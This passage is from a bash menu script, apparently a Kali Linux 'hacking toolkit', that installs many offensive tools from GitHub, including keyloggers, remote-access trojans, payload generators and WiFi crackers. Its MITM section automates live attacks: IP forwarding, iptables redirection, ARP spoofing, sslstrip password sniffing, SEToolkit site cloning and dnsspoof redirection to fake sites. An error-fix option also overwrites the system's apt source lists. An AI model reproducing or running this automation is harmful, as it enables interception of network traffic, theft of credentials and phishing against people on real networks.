848 | echo -e "Tool by Hackplayers"
849 | cd
850 | git clone https://github.com/Hackplayers/4nonimizer.git
851 | cd 4nonimizer
852 | chmod +x 4nonimizer
853 | ./4nonimizer install
854 | clear
855 | cd
856 | apt-get install python-pip
857 | apt-get install php-curl
858 | gem install pcaprub
859 | gem install packetfu
860 | elif [ "$REIN" = "22" ]
861 | then
862 | apt-get install openvas
863 | openvas-setup
864 | elif [ "$REIN" = "23" ]
865 | then
866 | if [ -d "/root/BeeLogger" ]
867 | then
868 | echo -e "Removing old..."
869 | echo -e "$PAKTC"
870 | $READAK
871 | rm -r /root/BeeLogger
872 | fi
873 | echo -e "Installing BeeLogger"
874 | echo -e "Tool by Alisson Moretto - 4w4k3"
875 | cd
876 | git clone https://github.com/4w4k3/BeeLogger.git
877 | cd BeeLogger
878 | chmod +x install.sh
879 | ./install.sh
880 | cd
881 | apt-get install python-pip
882 | apt-get install php-curl
883 | gem install pcaprub
884 | gem install packetfu
885 | clear
886 | elif [ "$REIN" = "24" ]
887 | then
888 | if [ -d "/root/ezsploit" ]
889 | then
890 | echo -e "Removing old..."
891 | echo -e "$PAKTC"
892 | $READAK
893 | rm -r /root/ezsploit
894 | fi
895 | echo -e "Installing Ezsploit"
896 | echo -e "Tool by rand0m1ze"
897 | git clone https://github.com/rand0m1ze/ezsploit.git
898 | cd ezsploit/
899 | chmod +x ezsploit.sh
900 | elif [ "$REIN" = "25" ]
901 | then
902 | if [ -d "/root/pupy" ]
903 | then
904 | echo -e "Removing old..."
905 | echo -e "$PAKTC"
906 | $READAK
907 | rm -r /root/pupy
908 | fi
909 | echo -e "Installing Pupy"
910 | echo -e "Tool by n1nj4sec"
911 | cd
912 | git clone https://github.com/n1nj4sec/pupy.git
913 | cd /root/pupy
914 | git submodule init
915 | git submodule update
916 | cd /root/pupy/pupy
917 | pip install -r requirements.txt
918 | cd
919 | elif [ "$REIN" = "26" ]
920 | then
921 | if [ -d "/root/zirikatu" ]
922 | then
923 | echo -e "Removing old..."
924 | echo -e "$PAKTC"
925 | $READAK
926 | rm -r /root/zirikatu
927 | fi
928 | echo -e "Installing Zirikatu"
929 | echo -e "Tool by pasahitz"
930 | cd
931 | git clone https://github.com/pasahitz/zirikatu.git
932 | cd zirikatu
933 | chmod +x zirikatu.sh
934 | elif [ "$REIN" = "27" ]
935 | then
936 | if [ -d "/root/WiFi-autopwner" ]
937 | then
938 | echo -e "Removing old..."
939 | echo -e "$PAKTC"
940 | $READAK
941 | rm -r /root/WiFi-autopwner
942 | fi
943 | echo -e "Installing WiFi-autopwner"
944 | echo -e "Tool by Mi-Al"
945 | cd
946 | git clone https://github.com/Mi-Al/WiFi-autopwner.git
947 | elif [ "$REIN" = "28" ]
948 | then
949 | if [ -d "/root/bully" ]
950 | then
951 | echo -e "Removing old..."
952 | echo -e "$PAKTC"
953 | $READAK
954 | rm -r /root/bully
955 | fi
956 | echo -e "Installing Bully"
957 | echo -e "Tool by Aanarchyy"
958 | cd
959 | git clone https://github.com/aanarchyy/bully.git
960 | cd bully
961 | cd src
962 | make
963 | sudo make install
964 | elif [ "$REIN" = "29" ]
965 | then
966 | if [ -d "/root/kali-anonsurf" ]
967 | then
968 | echo -e "Removing old..."
969 | echo -e "$PAKTC"
970 | $READAK
971 | rm -r /root/kali-anonsurf
972 | fi
973 | cd
974 | echo -e "Installing Anonsurf"
975 | echo -e "Tool by Und3rf10w"
976 | git clone https://github.com/Und3rf10w/kali-anonsurf.git
977 | cd kali-anonsurf
978 | chmod +x installer.sh
979 | ./installer.sh
980 | sleep 1
981 | elif [ "$REIN" = "30" ]
982 | then
983 | if [ -d "/root/anonym8" ]
984 | then
985 | echo -e "Removing old..."
986 | echo -e "$PAKTC"
987 | $READAK
988 | rm -r /root/anonym8
989 | fi
990 | echo -e "Installing Anonym8"
991 | echo -e "Tool by HiroshiManRise"
992 | git clone https://github.com/HiroshiManRise/anonym8.git
993 | cd anonym8
994 | chmod +x INSTALL.sh
995 | ./INSTALL.sh
996 | sleep 1
997 | elif [ "$REIN" = "31" ]
998 | then
999 | if [ -d "/root/TheFatRat" ]
1000 | then
1001 | echo -e "Removing old..."
1002 | echo -e "$PAKTC"
1003 | $READAK
1004 | rm -r /root/TheFatRat
1005 | fi
1006 | echo -e "Installing TheFatRat"
1007 | echo -e "Tool by Screetsec"
1008 | cd
1009 | git clone https://github.com/Screetsec/TheFatRat.git
1010 | cd TheFatRat
1011 | chmod +x setup.sh && ./setup.sh
1012 | elif [ "$REIN" = "32" ]
1013 | then
1014 | cd
1015 | if [ -f "/root/ipscan_*" ]
1016 | then
1017 | echo -e "Removing old file"
1018 | sleep 2
1019 | rm -f /root/ipscan_*
1020 | fi
1021 | echo -e "Downloading angryipscanner"
1022 | sleep 2
1023 | wget https://github.com/angryip/ipscan/releases/download/3.5.1/ipscan_3.5.1_amd64.deb
1024 | echo -e "Installing..."
1025 | dpkg -i ipscan_*
1026 | echo -e "Done"
1027 | sleep 1
1028 | elif [ "$REIN" = "33" ]
1029 | then
1030 | if [ -d /root/Sn1per ]
1031 | then
1032 | echo -e "Removing old..."
1033 | echo -e "$PAKTC"
1034 | $READAK
1035 | rm -r /root/Sn1per
1036 | fi
1037 | echo -e "Installing Sn1per"
1038 | echo -e "Tool by 1N3"
1039 | cd
1040 | git clone https://github.com/1N3/Sn1per.git
1041 | cd /root/Sn1per
1042 | chmod +x install.sh
1043 | ./install.sh
1044 | elif [ "$REIN" = "34" ]
1045 | then
1046 | if [ -d /root/ReconDog ]
1047 | then
1048 | echo -e "Removing old..."
1049 | echo -e "$PAKTC"
1050 | $READAK
1051 | rm -r /root/ReconDog
1052 | fi
1053 | cd
1054 | echo -e "Installing ReconDog"
1055 | echo -e "Tool by UltimateHackers"
1056 | git clone https://github.com/UltimateHackers/ReconDog.git
1057 | elif [ "$REIN" = "35" ]
1058 | then
1059 | if [ -d /root/RED_HAWK ]
1060 | then
1061 | echo -e "Removing old..."
1062 | echo -e "$PAKTC"
1063 | $READAK
1064 | rm -r /root/RED_HAWK
1065 | fi
1066 | cd
1067 | echo -e "Installing RED HAWK"
1068 | echo -e "Tool by Tuhinshubhra"
1069 | git clone https://github.com/Tuhinshubhra/RED_HAWK.git
1070 | elif [ "$REIN" = "36" ]
1071 | then
1072 | if [ -d /root/Winpayloads ]
1073 | then
1074 | echo -e "Removing old..."
1075 | echo -e "$PAKTC"
1076 | $READAK
1077 | rm -r /root/Winpayloads
1078 | fi
1079 | cd
1080 | echo -e "Installing Winpayloads"
1081 | echo -e "Tool by Nccgroup"
1082 | git clone https://github.com/nccgroup/Winpayloads.git
1083 | cd /root/Winpayloads
1084 | chmod +x setup.sh
1085 | ./setup.sh
1086 | cd
1087 | elif [ "$REIN" = "37" ]
1088 | then
1089 | apt-get install shellter
1090 | sleep 2
1091 | elif [ "$REIN" = "38" ]
1092 | then
1093 | apt install golang upx-ucl -y
1094 | cd
1095 | if [ -d /root/CHAOS ]
1096 | then
1097 | echo -e "Removing old..."
1098 | echo -e "$PAKTC"
1099 | $READAK
1100 | rm -r /root/CHAOS
1101 | fi
1102 | git clone https://github.com/tiagorlampert/CHAOS.git
1103 | elif [ "$REIN" = "39" ]
1104 | then
1105 | if [ -d /root/routersploit ]
1106 | then
1107 | echo -e "Removing old..."
1108 | echo -e "$PAKTC"
1109 | $READAK
1110 | rm -r /root/routersploit
1111 | fi
1112 | cd
1113 | echo -e "Installing routersploit"
1114 | echo -e "Tool by reverse-shell"
1115 | git clone https://github.com/reverse-shell/routersploit
1116 | cd /root/routersploit
1117 | pip install -r requirements.txt
1118 | cd
1119 | elif [ "$REIN" = "40" ]
1120 | then
1121 | apt-get install geany
1122 | elif [ "$REIN" = "41" ]
1123 | then
1124 | if [ -d /root/Infoga ]
1125 | then
1126 | echo -e "Removing old..."
1127 | echo -e "$PAKTC"
1128 | $READAK
1129 | rm -r /root/Infoga
1130 | fi
1131 | git clone https://github.com/m4ll0k/Infoga.git
1132 | cd /root/Infoga
1133 | pip install -r requirements.txt
1134 | cd
1135 | elif [ "$REIN" = "42" ]
1136 | then
1137 | if [ -d /root/nWatch ]
1138 | then
1139 | echo -e "Removing old..."
1140 | echo -e "$PAKTC"
1141 | $READAK
1142 | rm -r /root/nWatch
1143 | fi
1144 | cd
1145 | echo -e "Installing nWatch"
1146 | echo -e "Tool by Suraj"
1147 | git clone https://github.com/suraj-root/nWatch.git
1148 | elif [ "$REIN" = "43" ]
1149 | then
1150 | if [ -d /root/eternal_scanner ]
1151 | then
1152 | echo -e "Removing old..."
1153 | echo -e "$PAKTC"
1154 | $READAK
1155 | rm -r /root/eternal_scanner
1156 | fi
1157 | cd
1158 | echo -e "Installing eternal_scanner"
1159 | echo -e "Tool by Peterpt"
1160 | git clone https://github.com/peterpt/eternal_scanner.git
1161 | apt-get install masscan metasploit-framework
1162 | elif [ "$REIN" = "44" ]
1163 | then
1164 | if [ -d /root/eaphammer ]
1165 | then
1166 | echo -e "Removing old..."
1167 | echo -e "$PAKTC"
1168 | $READAK
1169 | rm -r /root/eaphammer
1170 | fi
1171 | cd
1172 | echo -e "Installing eaphammer"
1173 | echo -e "Tool by s0lst1c3"
1174 | git clone https://github.com/s0lst1c3/eaphammer
1175 | cd eaphammer
1176 | chmod +x kali-setup
1177 | ./kali-setup
1178 | cd
1179 | clear
1180 | apt-get install python-tqdm
1181 | elif [ "$REIN" = "45" ]
1182 | then
1183 | if [ -d /root/dagon ]
1184 | then
1185 | echo -e "Removing old..."
1186 | echo -e "$PAKTC"
1187 | $READAK
1188 | rm -r /root/dagon
1189 | fi
1190 | cd
1191 | echo -e "Installing Dagon"
1192 | echo -e "Tool by Ekultek"
1193 | git clone https://github.com/ekultek/dagon.git
1194 | cd dagon
1195 | pip install -r requirements.txt
1196 | pip2.7 install -r requirements.txt
1197 | apt-get install bcrypt
1198 | cd
1199 | elif [ "$REIN" = "46" ]
1200 | then
1201 | if [ -d /root/LALIN ]
1202 | then
1203 | echo -e "Removing old..."
1204 | echo -e "$PAKTC"
1205 | $READAK
1206 | rm -r /root/LALIN
1207 | fi
1208 | cd
1209 | echo -e "Installing Lalin"
1210 | echo -e "Tool by Edo -maland-"
1211 | git clone https://github.com/Screetsec/LALIN.git
1212 | cd LALIN
1213 | chmod +x Lalin.sh
1214 | cd
1215 | elif [ "$REIN" = "47" ]
1216 | then
1217 | if [ -d /root/KnockMail ]
1218 | then
1219 | echo -e "Removing old..."
1220 | echo -e "$PAKTC"
1221 | $READAK
1222 | rm -r /root/KnockMail
1223 | fi
1224 | cd
1225 | echo -e "Installing KnockMail"
1226 | echo -e "Tool by 4w4k3"
1227 | git clone https://github.com/4w4k3/KnockMail.git
1228 | cd KnockMail
1229 | pip install -r requeriments.txt
1230 | cd
1231 | elif [ "$REIN" = "48" ]
1232 | then
1233 | if [ -d /root/BoopSuite ]
1234 | then
1235 | echo -e "Removing old..."
1236 | echo -e "$PAKTC"
1237 | $READAK
1238 | rm -r /root/BoopSuite
1239 | fi
1240 | cd
1241 | echo -e "Installing BoopSuite"
1242 | echo -e "Tool by MisterBianco"
1243 | git clone https://github.com/M1ND-B3ND3R/BoopSuite.git
1244 | cd BoopSuite
1245 | pip2.7 install -r requirements.txt
1246 | pip install -r requirements.txt
1247 | chmod +x install.py
1248 | ./install.py
1249 | cd
1250 | elif [ "$REIN" = "49" ]
1251 | then
1252 | if [ -f /root/ngrok ]
1253 | then
1254 | echo -e "Removing old..."
1255 | echo -e "$PAKTC"
1256 | $READAK
1257 | rm /root/ngrok
1258 | fi
1259 | rm -f /root/ngrok.zip
1260 | cd
1261 | echo -e "Downloading Ngrok"
1262 | wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip --output-document=/root/ngrok.zip
1263 | unzip /root/ngrok.zip
1264 | elif [ "$REIN" = "back" ]
1265 | then
1266 | clear
1267 | break
1268 | elif [ "$REIN" = "00" ]
1269 | then
1270 | exec bash "$0"
1271 | elif [ "$REIN" = "0" ]
1272 | then
1273 | clear
1274 | exit
1275 | fi
1276 | done
1277 | }
1278 | function errors_menu
1279 | {
1280 | echo -e "-----------------------------"$RS"ERRORS"$CE"------------------------------"
1281 | printf '\033]2;ERRORS\a'
1282 | echo -e ""$YS" 1"$CE") Fix no audio issue"
1283 | echo -e ""$YS" 2"$CE") No output in wash"
1284 | echo -e ""$YS" 3"$CE") No full screen"
1285 | echo -e ""$YS" 4"$CE") Error constructing proxy for org.gnome.Terminal"
1286 | echo -e ""$YS" 5"$CE") Error starting apache2 service"
1287 | echo -e ""$YS" 6"$CE") Errors when apt-get update"
1288 | echo -e ""$YS"back"$CE") Go back"
1289 | echo -e ""$YS" 0"$CE") EXIT"
1290 | echo -e " Choose: "
1291 | read ERRS
1292 | if [ "$ERRS" = "1" ]
1293 | then
1294 | clear
1295 | echo -e "Trying to get you some audio..."
1296 | sleep 2
1297 | clear
1298 | echo -e "Press "$YS"y"$CE" if/when prompted"
1299 | sleep 3
1300 | clear
1301 | echo -e "Installing pulseaudio......."
1302 | sleep 1
1303 | apt-get pulseaudio
1304 | echo -e "Enabling pulseaudio......."
1305 | sleep 1
1306 | systemctl --user enable pulseaudio && systemctl --user start pulseaudio
1307 | clear
1308 | echo -e "Done!"
1309 | sleep 1
1310 | clear
1311 | echo -e "I mean...Try to see if you have audio."
1312 | sleep 3
1313 | echo -e " "
1314 | echo -e "That's all i can do :/"
1315 | sleep 2
1316 | echo -e " "
1317 | echo -e "If it wasn't fix , then try rebooting"
1318 | elif [ "$ERRS" = "2" ]
1319 | then
1320 | clear
1321 | echo -e "Ok...Lets try to fix this..."
1322 | sleep 1
1323 | mkdir /etc/reaver
1324 | echo -e "It seems to be fixed."
1325 | echo -e "Enter you interface"
1326 | read INTWASH
1327 | echo -e "Press "$YS"many key"$CE" to test wash"
1328 | echo -e "Also try "wash -i wlan0mon -a" to display all networks"
1329 | wash -i $INTWASH
1330 | elif [ "$ERRS" = "3" ]
1331 | then
1332 | apt-get install open-vm-tools-desktop fuse
1333 | echo -e "Restart your vistual machine..."
1334 | sleep 2
1335 | echo -e "$PAKTGB"
1336 | $READAK
1337 | elif [ "$ERRS" = "4" ]
1338 | then
1339 | locale-gen
1340 | localectl set-locale LANG="en_US.UTF-8"
1341 | sleep 2
1342 | echo -e "Reboot your system now"
1343 | sleep 3
1344 | elif [ "$ERRS" = "5" ]
1345 | then
1346 | service nginx stop
1347 | echo -e "I think i fixed it. Try again: service apache2 start "
1348 | sleep 5
1349 | elif [ "$ERRS" = "6" ]
1350 | then
1351 | echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list
1352 | rm -r -f /etc/apt/sources.list.d/*
1353 | echo -e "Try apt-get update again. That's all i can do."
1354 | sleep 3
1355 | elif [ "$ERRS" = "back" ]
1356 | then
1357 | BACKL="1"
1358 | break
1359 | elif [ "$ERRS" = "0" ]
1360 | then
1361 | clear
1362 | exit
1363 | elif [ "$ERRS" = "00" ]
1364 | then
1365 | clear
1366 | exec bash "$0"
1367 | else
1368 | clear
1369 | echo -e "Not an valid option...."
1370 | exec bash "$0"
1371 | fi
1372 | }
1373 | function keyboard_shortcuts
1374 | {
1375 | if [ ! -d ""$KSPATH"" ]
1376 | then
1377 | mkdir "$KSPATH"
1378 | fi
1379 | while true
1380 | do
1381 | echo -e "-----------------------"$RS"KEYBOARD SHORTCUTS"$CE"------------------------"
1382 | printf '\033]2;KEYBOARD SHORTCUTS\a'
1383 | echo -e ""$YS" 1"$CE") Tools"
1384 | echo -e ""$YS" 2"$CE") See hidden shortcuts"
1385 | echo -e ""$YS"back"$CE") Go back"
1386 | #~ echo -e ""$YS"00"$CE") Main menu"
1387 | echo -e ""$YS" 0"$CE") EXIT"
1388 | read KS
1389 | clear
1390 | if [ "$KS" = "1" ]
1391 | then
1392 | while true
1393 | do
1394 | echo -e "Available shortcuts: "$YS"reset"$CE") Delete all shortcuts"
1395 | nn=1
1396 | #start sorting out all the available shortcuts
1397 | HOWADD=$(( HOWMANYTOOLS + 1 ))
1398 | while [ "$nn" != "$HOWADD" ]
1399 | do
1400 | listshortcuts
1401 | #adding a space where needed on the output,so it will be sorted correctly
1402 | if [ "$nn" -lt "10" ]
1403 | then
1404 | n=" $nn"
1405 | else
1406 | n="$nn"
1407 | fi
1408 | if [ ! -f ""$KSPATH"/"$TITLE"/"$TITLE".txt" ]
1409 | then
1410 | echo -e ""$YS""$n""$CE") "$TITLE""
1411 | else
1412 | read KSKS < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
1413 | if [ "$KSKS" = "" ]
1414 | then
1415 | KSKS="ERROR(fix=recreate the shortcut)"
1416 | else
1417 | read currentks < "$KSPATH"/"$TITLE"/"$TITLE"ks.txt
1418 | size=${#TITLE}
1419 | calc=$(( 35-size ))
1420 | numcalc=1
1421 | SPACES=""
1422 | while [ $numcalc != $calc ]
1423 | do
1424 | SPACES=""$SPACES"_"
1425 | numcalc=$(( numcalc+1 ))
1426 | done
1427 | #~ read SPACES < "$KSPATH"/spaces.txt
1428 | echo -e ""$YS""$n""$CE") "$TITLE""$SPACES""$KSKS""
1429 | fi
1430 | fi
1431 | nn=$(( nn+1 ))
1432 | done
1433 | echo -e ""$YS"back"$CE") Go back"
1434 | #echo -e ""$YS" 0"$CE") EXIT"
1435 | echo -e "Choose: "
1436 | #nn=""
1437 | read nn
1438 | clear
1439 | listshortcuts
1440 | if [ "$nn" = "" ]
1441 | then
1442 | continue
1443 | fi
1444 | if [ "$nn" = "back" ]
1445 | then
1446 | clear
1447 | break
1448 | elif [ "$nn" = "0" ]
1449 | then
1450 | clear
1451 | exit
1452 | elif [ "$nn" = "00" ]
1453 | then
1454 | exec bash "$0"
1455 | elif [ "$nn" = "reset" ]
1456 | then
1457 | rm -r "$KSPATH"/*
1458 | elif [ "$nn" -le "$HOWMANYTOOLS" ]
1459 | then
1460 | createshortcut
1461 | fi
1462 | done
1463 | elif [ "$KS" = "2" ]
1464 | then
1465 | hidden_shortcuts
1466 | elif [ "$KS" = "back" ]
1467 | then
1468 | BACKL="1"
1469 | clear
1470 | break
1471 | elif [ "$KS" = "0" ]
1472 | then
1473 | clear
1474 | exit
1475 | elif [ "$KS" = "00" ]
1476 | then
1477 | exec bash "$0"
1478 | fi
1479 | done
1480 | }
1481 | function mitm_menu
1482 | {
1483 | clear
1484 | echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
1485 | printf '\033]2;MITM\a'
1486 | echo -e ""$YS" 1"$CE") Password sniff-sslstrip"
1487 | echo -e ""$YS" 2"$CE") SET + mitm + dnsspoofing"
1488 | echo -e ""$YS"back"$CE") Go back"
1489 | echo -e ""$YS" 0"$CE") EXIT"
1490 | read MITMATT
1491 | clear
1492 | if [ "$MITMATT" = "1" ]
1493 | then
1494 | while true
1495 | do
1496 | clear
1497 | echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
1498 | echo -e ""$YS" 1"$CE") Enable ip_forward "$YS"d1"$CE") Disable ip_forward "
1499 | echo -e ""$YS" 2"$CE") Set iptables"
1500 | echo -e ""$YS" 3"$CE") Scan and select target IP "$YS"33"$CE") I have scaned"
1501 | echo -e ""$YS" 4"$CE") Open the sslstrip log" # "$YS"44"$CE") Filter credentials"
1502 | echo -e ""$YS"back"$CE") Go back"
1503 | echo -e ""$YS" 0"$CE") EXIT"
1504 | echo -e "Choose: "
1505 | read -e MITMCH
1506 | if [ "$MITMCH" = "1" ]
1507 | then
1508 | echo "1" > /proc/sys/net/ipv4/ip_forward
1509 | echo -e "Done."
1510 | sleep 1
1511 | elif [ "$MITMCH" = "d1" ]
1512 | then
1513 | echo "0" > /proc/sys/net/ipv4/ip_forward
1514 | echo -e "Done."
1515 | sleep 1
1516 | elif [ "$MITMCH" = "2" ]
1517 | then
1518 | clear
1519 | echo -e "Redirect tcp port 80 to port("$YS"Enter"$CE"=8080):"
1520 | read PORTTCP
1521 | if [ "$PORTTCP" = "" ]
1522 | then
1523 | PORTTCP="8080"
1524 | fi
1525 | clear
1526 | echo -e "Redirect udp port 40 to port("$YS"Enter"$CE"=40):"
1527 | read PORTUDP
1528 | if [ "$PORTUDP" = "" ]
1529 | then
1530 | PORTUDP="40"
1531 | fi
1532 | iptables --flush
1533 | iptables --flush -t nat
1534 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $PORTTCP
1535 | iptables -t nat -A PREROUTING -p udp --destination-port 40 -j REDIRECT --to-port $PORTUDP
1536 | echo -e "Done."
1537 | sleep 1
1538 | elif [ "$MITMCH" = "3" ]
1539 | then
1540 | clear
1541 | route -n
1542 | echo -e ""
1543 | echo -e ""
1544 | echo -e "Enter your gateway(prefer eth0 gateway):"
1545 | read GATENM
1546 | echo -e ""
1547 | echo -e "Enter the gateway's interface("$YS"Enter"$CE"=eth0):"
1548 | read GATEINT
1549 | if [ "$GATEINT" = "" ]
1550 | then
1551 | GATEINT="eth0"
1552 | fi
1553 | while true
1554 | do
1555 | clear
1556 | nmap -sP "$GATENM"/24
1557 | echo -e ""
1558 | echo -e ""
1559 | echo -e "Enter your target IP:"
1560 | read TARGIP
1561 | if [ "$TARGIP" = "r" ]
1562 | then
1563 | continue
1564 | else
1565 | break
1566 | fi
1567 | done
1568 | echo -e ""
1569 | echo -e "$PAKTC"
1570 | $READAK
1571 | export GATENM
1572 | export GATEINT
1573 | export TARGIP
1574 | export PORTTCP
1575 | export PORTUDP
1576 | cd "$LPATH"/ls
1577 | gnome-terminal --geometry 60x12+0+999999 -e ./l131.sh
1578 | gnome-terminal --geometry 60x20+999999+999999 -e ./l133.sh
1579 | gnome-terminal --geometry 60x20+999999+0 -e ./l132.sh
1580 | sslstrip -l $PORTTCP -w /root/sslstrip.log
1581 | echo -e "$PAKTGB"
1582 | $READAK
1583 | continue
1584 | elif [ "$MITMCH" = "33" ]
1585 | then
1586 | clear
1587 | echo -e "Enter your gateway(prefer eth0 gateway):"
1588 | read GATENM
1589 | echo -e ""
1590 | echo -e "Enter the gateway's interface("$YS"Enter"$CE"=eth0):"
1591 | read GATEINT
1592 | if [ "$GATEINT" = "" ]
1593 | then
1594 | GATEINT="eth0"
1595 | fi
1596 | clear
1597 | echo -e "Enter your target IP("$YS"r"$CE"=rescan):"
1598 | read TARGIP
1599 | echo -e ""
1600 | echo -e "$PAKTC"
1601 | $READAK
1602 | export GATENM
1603 | export GATEINT
1604 | export TARGIP
1605 | export PORTTCP
1606 | export PORTUDP
1607 | cd "$LPATH"/ls
1608 | gnome-terminal --geometry 60x25+0+999999 -e ./l131.sh
1609 | gnome-terminal --geometry 60x25+999999+0 -e ./l132.sh
1610 | gnome-terminal --geometry 60x25+999999+999999 -e ./l133.sh
1611 | sslstrip -l $PORTTCP -w /root/sslstrip.log
1612 | echo -e "$PAKTGB"
1613 | $READAK
1614 | continue
1615 | elif [ "$MITMCH" = "4" ]
1616 | then
1617 | leafpad /root/sslstrip.log
1618 | #~ elif [ "$MITMCH" = "44" ]
1619 | #~ then
1620 | elif [ "$MITMCH" = "back" ]
1621 | then
1622 | clear
1623 | break
1624 | elif [ "$MITMCH" = "00" ]
1625 | then
1626 | clear
1627 | exec bash "$0"
1628 | elif [ "$MITMCH" = "0" ]
1629 | then
1630 | clear
1631 | exit
1632 | fi
1633 | done
1634 | elif [ "$MITMATT" = "2" ]
1635 | then
1636 | while true
1637 | do
1638 | clear
1639 | echo -e "------------------------------"$RS"MITM"$CE"-------------------------------"
1640 | echo -e ""$YS" 1"$CE") Enable ip_forward "$YS"d1"$CE") Disable ip_forward"
1641 | echo -e ""$YS" 2"$CE") Scan and select target IP "$YS"22"$CE") I have scaned"
1642 | echo -e ""$YS" 3"$CE") Start ARPspoofing"
1643 | #~ echo -e ""$YS" 4"$CE") Start apache2 service "$YS"d4"$CE") Stop apache2 service"
1644 | echo -e ""$YS" 4"$CE") Start SEToolkit"
1645 | echo -e ""$YS" 5"$CE") Start DNSspoofing"
1646 | echo -e ""$YS"back"$CE") Go back"
1647 | echo -e ""$YS" 0"$CE") EXIT"
1648 | echo -e "Choose: "
1649 | read -e MITMSET
1650 | clear
1651 | if [ "$MITMSET" = "1" ]
1652 | then
1653 | echo "1" > /proc/sys/net/ipv4/ip_forward
1654 | echo -e "Done."
1655 | sleep 1
1656 | elif [ "$MITMSET" = "d1" ]
1657 | then
1658 | echo "0" > /proc/sys/net/ipv4/ip_forward
1659 | echo -e "Done."
1660 | sleep 1
1661 | elif [ "$MITMSET" = "2" ]
1662 | then
1663 | route -n
1664 | echo -e ""
1665 | echo -e ""
1666 | echo -e "Enter your gateway:"
1667 | read GATENM
1668 | echo -e ""
1669 | echo -e "Enter the gateway's interface(e.g: wlan0):"
1670 | read GATEINT
1671 | #~ if [ "$GATEINT" = "" ]
1672 | #~ then
1673 | #~ GATEINT="eth0"
1674 | #~ fi
1675 | while true
1676 | do
1677 | clear
1678 | nmap -sP "$GATENM"/24
1679 | echo -e ""
1680 | echo -e ""
1681 | echo -e "Enter your target IP("$YS"r"$CE"=rescan):"
1682 | read TARGIP
1683 | if [ "$TARGIP" = "r" ]
1684 | then
1685 | continue
1686 | else
1687 | break
1688 | fi
1689 | done
1690 | elif [ "$MITMSET" = "22" ]
1691 | then
1692 | echo -e "Enter your gateway:"
1693 | read GATENM
1694 | echo -e ""
1695 | echo -e "Enter the gateway's interface(e.g: wlan0):"
1696 | read GATEINT
1697 | #~ if [ "$GATEINT" = "" ]
1698 | #~ then
1699 | #~ GATEINT="eth0"
1700 | #~ fi
1701 | clear
1702 | echo -e "Enter your target IP:"
1703 | read TARGIP
1704 | elif [ "$MITMSET" = "3" ]
1705 | then
1706 | export PAKTC
1707 | export GATEINT
1708 | export TARGIP
1709 | export GATENM
1710 | cd "$LPATH"/ls
1711 | gnome-terminal --geometry 60x15+999999+0 -e ./l132.sh
1712 | gnome-terminal --geometry 60x15+999999+999999 -e ./l133.sh
1713 | #~ elif [ "$MITMSET" = "4" ]
1714 | #~ then
1715 | #~ service apache2 start
1716 | #~ elif [ "$MITMSET" = "d4" ]
1717 | #~ then
1718 | #~ service apache2 stop
1719 | elif [ "$MITMSET" = "4" ]
1720 | then
1721 | echo -e "Clone a website to one of the following IP(s):"
1722 | ip addr | grep '/24' | awk -F "inet " {'print $2'} | cut -d '/' -f1
1723 | echo -e "$PAKTC"
1724 | $READAK
1725 | gnome-terminal --geometry 66x40+999999+0 -e setoolkit
1726 | elif [ "$MITMSET" = "5" ]
1727 | then
1728 | echo -e "Making you a hosts.txt file"
1729 | echo -e ""
1730 | echo -e "Enter your IP address that you started the server:"
1731 | echo -e "One of this/these:"
1732 | ip addr | grep '/24' | awk -F "inet " {'print $2'} | cut -d '/' -f1
1733 | read -e SERVIP
1734 | echo -e "Enter the interface of that IP(e.g: wlan0):"
1735 | read -e INTIP
1736 | if [ -f ""$LPATH"/HOSTS/hosts.txt" ]
1737 | then
1738 | rm "$LPATH"/HOSTS/hosts.txt
1739 | fi
1740 | mkdir "$LPATH"/HOSTS
1741 | clear
1742 | while true
1743 | do
1744 | clear
1745 | echo -e "Enter the URL you want to redirect your IP from(e.g: thisis.myfakesite.com):"
1746 | read -e URL
1747 | echo "$SERVIP $URL" >> "$LPATH"/HOSTS/hosts.txt
1748 | sleep 0.2
1749 | clear
1750 | echo -e "Add another one as well?"$YNYES""
1751 | read -e ANOTHERHOST
1752 | if [ "$ANOTHERHOST" = "n" ]
1753 | then
1754 | break
1755 | fi
1756 | done
1757 | clear
1758 | echo -e "Starting dnsspoof..."
1759 | echo -e "$PAKTC"
1760 | $READAK
1761 | export INTIP
1762 | xterm -geometry 60x15+0+999999 -e 'dnsspoof -i $INTIP -f "$LPATH"/HOSTS/hosts.txt'
1763 | elif [ "$MITMSET" = "back" ]
1764 | then
1765 | clear
1766 | break
1767 | elif [ "$MITMSET" = "00" ]
1768 | then
1769 | clear
1770 | exec bash "$0"
1771 | elif [ "$MITMSET" = "0" ]
1772 | then
1773 | clear
1774 | exit
1775 | fi
1776 | done
1777 | elif [ "$MITMATT" = "back" ]
1778 | then
1779 | BACKL="1"
1780 | break
1781 | elif [ "$MITMATT" = "00" ]
1782 | then
1783 | clear
1784 | exec bash "$0"
1785 | elif [ "$MITMATT" = "0" ]
1786 | then
1787 | clear
1788 | exit
1789 | fi
1790 | }
1791 | function dagon_script
1792 | {
1793 | printf '\033]2;Dagon\a'
1794 | while true
1795 | do
1796 | clear
1797 | if [[ $HASH = "" || $HASH = "\e[1;31mNONE\e[0m" ]]
1798 | then
1799 | HASH="\e[1;31mNONE\e[0m"
1800 | OK=0
1801 | fi
1802 | if [[ $CORV = "" ]]
1803 | then
1804 | CORV="crack"
1805 | fi
1806 | echo -e "-----------------Basic options-----------------"
1807 | echo -e ""$YS" 1"$CE") Specify your hash(es) CURRENT:$HASH"
1808 | echo -e ""$YS" 2"$CE") Crack/verify CURRENT:$CORV"
1809 | if [ -f /root/lscript/hashlog.txt ]
1810 | then
1811 | echo -e ""$YS" 3"$CE") View your last log"
1812 | else
1813 | echo -e ""$RS" 3"$CE") View your last log"
1814 | fi
1815 | echo -e "--------------------Optional--------------------"
1816 | if [[ $DICTATTACK = "" ]]
1817 | then
1818 | DICTATTACK="OFF"
1819 | fi
1820 | echo -e ""$YS" 4"$CE") Dictionary attack CURRENT:$DICTATTACK"
1821 | if [[ $DICT = "" && $DICTATTACK = "OFF" ]]
1822 | then
1823 | DICT="OFF"
1824 | elif [[ $DICT = "\e[1;31mNONE\e[0m" && $DICTATTACK = "OFF" ]]
1825 | then
1826 | DICT="OFF"
1827 | elif [[ $DICT = "OFF" && $DICTATTACK = "ON" ]]
1828 | then
